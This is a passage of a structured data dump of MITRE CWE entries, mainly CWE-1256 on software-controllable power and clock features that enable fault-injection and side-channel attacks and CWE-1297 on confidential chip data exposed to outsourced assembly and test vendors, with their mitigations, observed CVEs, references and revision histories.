"Date": null,
"ModificationComment": "updated Applicable_Platforms, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Name, References, Relationships, Type",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Leak Through Insecure Indexing",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2011-03-29",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Leak Through Indexing of Private Data",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-02-24",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Information Exposure Through Indexing of Private Data",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "1230",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"285",
"1230",
"612"
]
] |
[] |
1256
|
Improper Restriction of Software Interfaces to Hardware Features
|
Base
|
Simple
|
Stable
|
The product provides software-controllable
device functionality for capabilities such as power and
clock management, but it does not properly limit
functionality that can lead to modification of
hardware memory or register bits, or the ability to
observe physical side channels.
|
It is frequently assumed that physical attacks such as fault injection and side-channel analysis require an attacker to have physical access to the target device. This assumption may be false if the device has improperly secured power management features, or similar features. For mobile devices, minimizing power consumption is critical, but these devices run a wide variety of applications with different performance requirements. Software-controllable mechanisms to dynamically scale device voltage and frequency and monitor power consumption are common features in today's chipsets, but they also enable attackers to mount fault injection and side-channel attacks without having physical access to the device.
Fault injection attacks involve strategic manipulation of bits in a device to achieve a desired effect such as skipping an authentication step, elevating privileges, or altering the output of a cryptographic operation. Manipulation of the device clock and voltage supply is a well-known technique to inject faults and is cheap to implement with physical device access. Poorly protected power management features allow these attacks to be performed from software. Other features, such as the ability to write repeatedly to DRAM at a rapid rate from unprivileged software, can result in bit flips in other memory locations (Rowhammer, [REF-1083]).
Side channel analysis requires gathering measurement traces of physical quantities such as power consumption. Modern processors often include power metering capabilities in the hardware itself (e.g., Intel RAPL) which if not adequately protected enable attackers to gather measurements necessary for performing side-channel attacks from software.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Memory Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Power Management Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Clock/Counter Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "An architect may initiate introduction of this weakness via exacting requirements for software accessible power/clock management requirements",
"Phase": "Architecture and Design"
},
{
"Note": "An implementer may introduce this weakness by assuming there are no consequences to unbounded power and clock management for secure components from untrusted ones.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Modify Application Data",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Integrity"
]
}
] |
[
{
"Description": "\n\nEnsure proper access control mechanisms protect software-controllable features altering physical operating conditions such as clock frequency and voltage.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "Plundervolt: Improper conditions check in voltage settings for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege and/or information disclosure via local access [REF-1081].",
"Link": "https://www.cve.org/CVERecord?id=CVE-2019-11157",
"Reference": "CVE-2019-11157"
},
{
"Description": "PLATYPUS Attack: Insufficient access control in the Linux kernel driver for some Intel processors allows information disclosure.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-8694",
"Reference": "CVE-2020-8694"
},
{
"Description": "Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-8695",
"Reference": "CVE-2020-8695"
},
{
"Description": "AMD extension to a Linux service does not require privileged access to the RAPL interface, allowing side-channel attacks.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-12912",
"Reference": "CVE-2020-12912"
},
{
"Description": "NaCl in 2015 allowed the CLFLUSH instruction, making Rowhammer attacks possible.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2015-0565",
"Reference": "CVE-2015-0565"
}
] | null | null |
[
"624",
"625"
] |
[
{
"Authors": [
"Kit Murdock",
"David Oswald",
"Flavio D Garcia",
"Jo Van Bulck",
"Frank Piessens",
"Daniel Gruss"
],
"Edition": null,
"ExternalReferenceID": "REF-1081",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Plundervolt",
"URL": "https://plundervolt.com/",
"URLDate": null
},
{
"Authors": [
"Adrian Tang",
"Simha Sethumadhavan",
"Salvatore Stolfo"
],
"Edition": null,
"ExternalReferenceID": "REF-1082",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "CLKSCREW: Exposing the Perils of Security-Oblivious Energy Management",
"URL": "https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-tang.pdf",
"URLDate": null
},
{
"Authors": [
"Yoongu Kim",
"Ross Daly",
"Jeremie Kim",
"Ji Hye Lee",
"Donghyuk Lee",
"Chris Wilkerson",
"Konrad Lai",
"Onur Mutlu"
],
"Edition": null,
"ExternalReferenceID": "REF-1083",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors",
"URL": "https://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf",
"URLDate": null
},
{
"Authors": [
"Project Zero"
],
"Edition": null,
"ExternalReferenceID": "REF-1225",
"Publication": null,
"PublicationDay": "09",
"PublicationMonth": "03",
"PublicationYear": "2015",
"Publisher": null,
"Section": null,
"Title": "Exploiting the DRAM rowhammer bug to gain kernel privileges",
"URL": "https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html",
"URLDate": null
},
{
"Authors": [
"Ross Anderson"
],
"Edition": null,
"ExternalReferenceID": "REF-1217",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2001",
"Publisher": null,
"Section": null,
"Title": "Security Engineering",
"URL": "https://www.cl.cam.ac.uk/~rja14/musicfiles/manuscripts/SEv1.pdf",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-08",
"SubmissionName": "Nicole Fern",
"SubmissionOrganization": "Cycuity (originally submitted as Tortuga Logic)",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Maintenance_Notes, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Functional_Areas, Maintenance_Notes",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Observed_Examples",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Modes_of_Introduction, Name, Observed_Examples, References, Relationships, Weakness_Ordinalities",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Provided Demonstrative Example for Hardware Root of Trust",
"ContributionDate": "2021-07-16",
"ContributionName": null,
"ContributionOrganization": "Cycuity (originally submitted as Tortuga Logic)",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "Provided detection method",
"ContributionDate": "2021-10-11",
"ContributionName": "Anders Nordstrom, Alric Althoff",
"ContributionOrganization": "Cycuity (originally submitted as Tortuga Logic)",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "updated description and extended description, detection method, and observed examples",
"ContributionDate": "2021-10-15",
"ContributionName": "Nicole Fern",
"ContributionOrganization": "Riscure",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2021-10-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Hardware Features Enable Physical Attacks from Software",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "285",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "Perform a security evaluation of system-level architecture and design with software-aided physical attacks in scope.",
"DetectionMethodID": null,
"Effectiveness": null,
"EffectivenessNotes": null,
"Method": "Manual Analysis"
},
{
"Description": "\n\nUse custom software to change registers that control clock settings or power settings to try to bypass security locks, or repeatedly write DRAM to try to change adjacent locations. This can be effective in extracting or changing data. The drawback is that it cannot be run before manufacturing, and it may require specialized software.\n",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Automated Dynamic Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This example considers the Rowhammer problem [REF-1083]. The Rowhammer issue was caused by a program in a tight loop writing repeatedly to a location to which the program was allowed to write but causing an adjacent memory location value to change.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "Continuously writing the same value to the same address causes the value of an adjacent location to change value.",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Preventing the loop required to defeat the Rowhammer exploit is not always possible:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "Redesign the RAM devices to reduce inter capacitive coupling making the Rowhammer exploit impossible.",
"IntroText": null,
"Language": "Other",
"Nature": "Good",
"Reference": null
},
{
"BodyText": "While the redesign may be possible for new devices, a redesign is not possible in existing devices. There is also the possibility that reducing capacitance with a relayout would impact the density of the device resulting in a less capable, more costly device.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Suppose a hardware design implements a set of software-accessible registers for scaling clock frequency and voltage but does not control access to these registers. Attackers may cause register and memory changes and race conditions by changing the clock or voltage of the device under their control.",
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider the following SoC design. Security-critical settings for scaling clock frequency and voltage are available in a range of registers bounded by [PRIV_END_ADDR : PRIV_START_ADDR] in the tmcu.csr module in the HW Root of Trust. These values are writable based on the lock_bit register in the same module. The lock_bit is only writable by privileged software running on the tmcu.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "We assume that untrusted software running on any of the Core{0-N} processors has access to the input and output ports of the hrot_iface. If untrusted software can clear the lock_bit or write the clock frequency and voltage registers due to inadequate protection, a fault injection attack could be performed.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] |
[
"Power",
"Clock"
] | null | null | null | 1
|
[
[
"284",
"285",
"1256"
]
] |
[] |
1297
|
Unprotected Confidential Information on Device is Accessible by OSAT Vendors
|
Base
|
Simple
|
Incomplete
|
The product does not adequately protect confidential information on the device from being accessed by Outsourced Semiconductor Assembly and Test (OSAT) vendors.
|
In contrast to complete vertical integration of architecting, designing, manufacturing, assembling, and testing chips all within a single organization, an organization can choose to simply architect and design a chip before outsourcing the rest of the process to OSAT entities (e.g., external foundries and test houses). In the latter example, the device enters an OSAT facility in a much more vulnerable pre-production stage where many debug and test modes are accessible. Therefore, the chipmaker must place a certain level of trust with the OSAT. To counter this, the chipmaker often requires the OSAT partner to enter into restrictive non-disclosure agreements (NDAs). Nonetheless, OSAT vendors likely have many customers, which increases the risk of accidental sharing of information. There may also be a security vulnerability in the information technology (IT) system of the OSAT facility. Alternatively, a malicious insider at the OSAT facility may carry out an insider attack. Considering these factors, it behooves the chipmaker to minimize any confidential information in the device that may be accessible to the OSAT vendor.
Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could provide improper authorization to sensitive information.
|
[
{
"Class": null,
"Name": "Verilog",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": null,
"Name": "VHDL",
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Processor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism",
"Execute Unauthorized Code or Commands",
"Modify Memory",
"Modify Files or Directories"
],
"Likelihood": [
"Medium"
],
"Note": "The impact depends on the confidential information itself and who is inadvertently granted access. For example, if the confidential information is a key that can unlock all the parts of a generation, the impact could be severe.",
"Scope": [
"Confidentiality",
"Integrity",
"Access Control",
"Authentication",
"Authorization",
"Availability",
"Accountability",
"Non-Repudiation"
]
}
] |
[
{
"Description": "\n\n - Ensure that when an OSAT vendor is allowed to access test interfaces necessary for preproduction and returned parts, the vendor only pulls the minimal information necessary. Also, architect the product in such a way that, when an \"unlock device\" request comes, it only unlocks that specific part and not all the parts for that product line.\n\n - Ensure that the product's non-volatile memory (NVM) is scrubbed of all confidential information and secrets before handing it over to an OSAT.\n\n - Arrange to secure all communication between an OSAT facility and the chipmaker.\n\n",
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] | null | null | null |
[
"1",
"180"
] |
[
{
"Authors": [
"Muhammad Yasin",
"Abhrajit Sengupta",
"Mohammed Thari Nabeel",
"Mohammed Ashraf",
"Jeyavijayan (JV) Rajendran",
"Ozgur Sinanoglu"
],
"Edition": null,
"ExternalReferenceID": "REF-1113",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Provably-Secure Logic Locking: From Theory To Practice",
"URL": "https://dl.acm.org/doi/10.1145/3133956.3133985",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Muhammad Yasin",
"Jeyavijayan (JV) Rajendran",
"Ozgur Sinanoglu"
],
"Edition": null,
"ExternalReferenceID": "REF-1114",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Trustworthy Hardware Design: Combinational Logic Locking Techniques",
"URL": "https://link.springer.com/book/10.1007/978-3-030-15334-2",
"URLDate": "2023-04-07"
}
] |
[
{
"Note": "This entry might be subject to CWE Scope Exclusion SCOPE.SITUATIONS (Focus on situations in which weaknesses may appear); SCOPE.HUMANPROC (Human/organizational process; and/or SCOPE.CUSTREL (Not customer-relevant).",
"Type": "Maintenance"
},
{
"Note": "This entry is still under development and will continue to see updates and content improvements.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-29",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-08-20",
"SubmissionVersion": "4.2",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Maintenance_Notes",
"ModificationDate": "2023-01-31",
